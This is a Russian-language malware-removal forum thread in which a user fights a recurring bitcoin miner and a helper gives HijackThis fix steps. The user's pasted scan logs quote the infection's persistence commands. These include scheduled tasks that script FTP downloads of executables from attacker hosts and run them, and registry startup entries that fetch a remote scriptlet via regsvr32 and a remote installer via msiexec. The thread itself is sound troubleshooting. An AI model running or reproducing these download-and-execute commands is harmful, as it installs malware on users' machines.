Перейти к содержанию

Троян майнер 0621.exe и lsmo.exe


Рекомендуемые сообщения

Сначала появился троян майнер 0621.ехе в папке debug в каталоге виндовс(ось 7х64). Успешно выпилил его без особых проблем.

Спустя пару дней появился новый троян lsmo.exe (уже в папке help), тоже майнит биткойны. Процесс хакер показывает, что запускается он процессом wininit. После удаления возвращается в рандомное время и снова начинает майнить. Последний месяц новых программ не устанавливалось. При этом левых процессов не запущено, компьютер не перезагружается, автозагрузка пустая, левых служб нет, в реестре тоже ничего нет в автозагрузке. В планировщике заданий нет ничего. Все темповые файлы почистил.

Не могу найти, что его скачивает по новой и запускает. Систему переставлять не очень хочется, слишком много нужного софта стоит.

Ссылка на комментарий
Поделиться на другие сайты

Куреитом прогонял, ничего не находит.

Логи прикрепил


Думаю вот что вызывает проблемы

log:

 

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

 

 

 

Вот еще гадость в реестре нашел, выпилил.

reg':

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start]
regsvr32 /u /s /i:http://js.mykings.top:280/v.sctscrobj.dll []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start1]
msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q []

 

В C:\Windows\System32\Tasks удалил файлы Mysa, Mysa1, ok

CollectionLog-2017.07.09-20.48.zip

Изменено пользователем netmaster
Ссылка на комментарий
Поделиться на другие сайты

1)

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lineage 2\ネ胙魵鐱 濵粽・url

заархивируйте и прикрепите к сообщению.

 

2)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

3) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
 

4) "Пофиксите" в HijackThis:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} - Bing - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: URL = http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} - e - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C} - Google - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
O2-32 - BHO: IETabPage Class - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\XTab\SupTab.dll (file missing)
O2-32 - BHO: PROMT - {1F13CE11-4FAC-49A9-8155-D4F3F0F91A33} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O3-32 - Toolbar: Переводчик PROMT - {C7DDDD27-F303-42A5-B979-51559F7DC0F0} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O4 - MSConfig\startupreg: [GarenaPlus] C:\Garena Plus\GarenaMessenger.exe -autolaunch (file missing) (HKCU) (2014/05/01)
O4 - MSConfig\startupreg: [NeteaseGacc] N:\Netease\ty\game\uu\uu.exe  (file missing) (HKLM) (2016/12/04)
O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/09)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/09)
O8 - Extra context menu item: Автоматически определить профиль перевода - N:\G\PRMT9\PRMTIE\aot.htm (file missing)
O8 - Extra context menu item: Настроить параметры перевода - N:\G\PRMT9\PRMTIE\options.htm (file missing)
O8 - Extra context menu item: Перевести всю страницу - N:\G\PRMT9\PRMTIE\page.htm (file missing)
O8 - Extra context menu item: Перевести выделенный текст - N:\G\PRMT9\PRMTIE\translat.htm (file missing)
O8 - Extra context menu item: Перевести поисковый запрос - N:\G\PRMT9\PRMTIE\search.htm (file missing)
O22 - Task (Ready): GameNet - C:/Program Files (x86)/QGNA/qGNA.exe /minimized (file missing)

 

5) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.
 

Ссылка на комментарий
Поделиться на другие сайты

Это что-то невероятное. Ничто не может справится с этим вирусом. Спустя 2-3 часа он снова вылезает и начинает майнить. Проблем он не доставляет, так как просто закрывается процесс, но всё же...Выход только переходить на 10-ку?

Ссылка на комментарий
Поделиться на другие сайты

@Михаил Андропов, здравствуйте! Не пишите в чужой теме. Создайте свою и выполните Порядок оформления запроса о помощи
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • scaramuccia
      Автор scaramuccia
      Всем привет!
      Касперский обнаружил объект HEUR:Trojan.Win32.Generic в установочном exe-файле. Скорее всего это ложное срабатывание, но все же.
      Он показывает полный путь к объекту: папка, архив, установочный файл и т. д. Как Касперский его так разбирает, если этот файл не распаковывается архиватором, пишет: "Ошибка. Есть данные после конца блока полезных данных"?
      Какие есть способы и ресурсы для этого?
      DIE показывает, что большую часть файла занимает оверлей, который хранит какую-то DLL.

    • Polina52
      Автор Polina52
      Начал греться ноутбук, грузится цп. На многие сайты не смогла зайти и некоторые программы поставить. Благодарю за ответ.
      Логи прилагаю
      Addition.txt FRST.txt
    • Unthondyyy
      Автор Unthondyyy
      Я далеко не очень хорошо разбираюсь в работе с системой, но я подцепил майнеры(видимо вместе с троянами). Просканив систему через Kaspersky Free нашел несколько файлов, также выжеперечисленных в заголовка, а Dr Web Cureit вообще ничего не нашел. Я удалил их, но вот опять они вернулись через час или два. Не знаю что делать они прячутся в системных файлах. А как найти там их не представляют ведь касперски думает что удалил их. Подскажите как быть? Если вдруг что то прикрепить надо - скажите, я прикреплю. Логи какие нибудь только скажите где их найти пожалуйста.
    • Полислава
      Автор Полислава
      Здравствуйте! 30 марта 2025 на ноутбук была совершена вирусная атака.
      Я успела в диспетчере отследить три процесса, которые затем исчезли. У меня был Kaspersky Total Security и он поймал вирус и решил с ним справиться. Но, к сожалению, вирус его благополучно поломал..
      Сильно грузит систему, я выследила, откуда майнер - он спрятался в png файлах папки WindowsApps/KasperskyShellEx20
      Папка не удаляется никак, пыталась и изменять владельца и при помощи Revo Uninstaller - не получается.
      Сделала в FarBar Recover SearchAll: Kaspersky и вот что обнаружено. Учитывая, что официальная утилита на удаление антивируса - ничего из этого не видит.

       
      Search.txt
      Так же прикрепляю результаты сканирования FarBar
      FRST.txt
    • itriedsohard
      Автор itriedsohard
      Недавно подловил при скачке множеста файлов с неизвестных источников и наловил вирусов. Вирус блокирует установку любого антивируса (Malwerbytes, 360 total sec, ESET, Avast, так же некторые утилиты как RogueKiller). Блокировал возможность восстановление через точки восстановления но по гайдам на ютубе удалось это разблокировать - не помогло. В безопасном режиме всё ещё нельзя установить никакой антивирус. Блокировки каких то сайтов со стороны вируса не увидел, заметил только небольшое падение FPS в играх. AutoLogger репорт прикрепил. Очень надеюсь на вашу помощь!




      CollectionLog-2025.03.02-02.47.zip
×
×
  • Создать...